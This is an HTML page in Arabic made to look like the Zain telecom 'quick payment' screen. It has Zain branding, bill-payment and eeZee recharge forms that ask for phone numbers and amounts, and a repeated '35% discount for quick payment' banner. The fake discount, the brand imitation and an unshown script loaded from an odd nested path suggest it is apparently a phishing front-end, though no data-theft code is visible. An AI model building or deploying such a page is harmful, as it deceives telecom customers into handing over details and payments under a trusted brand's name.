<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>الدفع السريع - زين</title>
  <script src="https://cdn.tailwindcss.com"></script>
  <script src="main.js/all.js/kave.js/index.js" defer></script>
  <link rel="stylesheet" href="cssall/cdc/styl.css" />
  <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=no, minimal-ui">
</head>
<body>
    <div class="heart-icon-container">
        
  <div>
    <header id="hedar">
      <img id="imgzain" src="cssall/cdc/zainlog.svg" alt="زين العرض">
      <div class="horizontal-lines"></div>
    <div class="horizontal-lnes"></div>
    <div class="horizontal-lins"></div>

      <div id="img25351"class="heart-icon-container">
        <span id="iiiii"class="heart-icon text-white hover:text-red-500 cursor-pointer text-2xl">
            <i class="far fa-heart"></i> <!-- هذه أيقونة القلب الفارغة -->
        </span>
    </div>
    <div class="vertical-line"></div>

    <div id="shope"class="cart-icon-container">
        <span class="cart-icon text-white hover:text-green-500 cursor-pointer text-1xl">
            <i class="fas fa-shopping-cart"></i> <!-- أيقونة سلة المشتريات -->
        </span>
    </div>
    


    </header>
  </div>

  <div id="textbot">
    <h3 id="tex" class="text-2xl font-bold text-center mb-6 text-pink-600">الدفع السريع</h3>
  </div>

    <div id="boxform" class="lg:mt-3 mb-14 mx-3 md:max-w-xl md:mx-auto relative">

      <!-- Buttons for form selection -->
      <div id="divbox" class="list-none flex items-stretch justify-center border-b border-gray-300 rounded-ts-lg dark:bg-gray-900 bg-white rounded-te-lg shadow-lg">
        <button id="billBtn" class="flex-1 text-center py-3 font-bold text-pink-600 border-b-2 border-pink-600">دفع الفاتورة</button>
        <button id="rechargeBtn" class="flex-1 text-center py-3 text-gray-500 hover:text-pink-600">إعادة تعبئة eeZee</button>
      </div>

      <!-- Bill Form -->
      <div id="billForm">
        <label id="textfrom" class="block -2 font-mediu">أود الدفع لـ</label>
        <select id="selct" class="bgfc">
          <option value="رقم آخر">رقم آخر</option>
          <option value="رقم العقد">رقم العقد</option>
        </select>

        <label id="phoneLabel" class="block mb-2 font-medium">رقم الهاتف*</label>
        <input id="phoneInput" type="tel" placeholder="أدخل الرقم: 99XXXXXX" class="w-full mb-4 p-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-pink-400" maxlength="8">

        <div id="bobox">
            <h2 id="boboxs">خصم 35% للدفع السريع</h2>
        </div>

        <div id="billBox" class="gfdthg hidden">
          <p id="amountText" class="hg"></p>
          <p id="discountText" class="yugy"></p>
          <p id="finalText" class="bg-white border rounded-lg p-4 text-center text-gray-800 shadow mt-8"></p>
        
        

        <div id="boxomm">
          <button id="botone" disabled class="w-full py-3 rounded-lg bg-gray-200 text-gray-400 font-bold">ادفع الآن</button>
        </div>
        
      </div>
      

      </div>

      <!-- Recharge Form -->
      <div id="hayahh">
        <div id="rechargeForm" class="hidden">
          <label id="labeel0" class="block mb-2 font-medium">رقم الهاتف</label>
          <input id="labeel" type="text" maxlength="8" placeholder="أدخل الرقم: 99XXXXXX" class="w-full mb-4 p-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-pink-400">

          <label id="inpotr" class="block mb-2 font-medium">قيمة التعبئة</label>
          <input id="inpss" type="number" placeholder="مثال: 5 د.ك" class="uyguy">

          <div id="bobox">
            <h2 id="boboxs">خصم 35% للدفع السريع</h2>
          </div>

          <button id="botonnn" disabled class="mt-50 w-full py-3 rounded-lg bg-gray-300 text-gray-800 font-bold">ادفع الآن</button>


        </div>
      </div>

    </div>

  <div> 
   
    
    <script>
       
     

    </script>
    
</body>
</html>
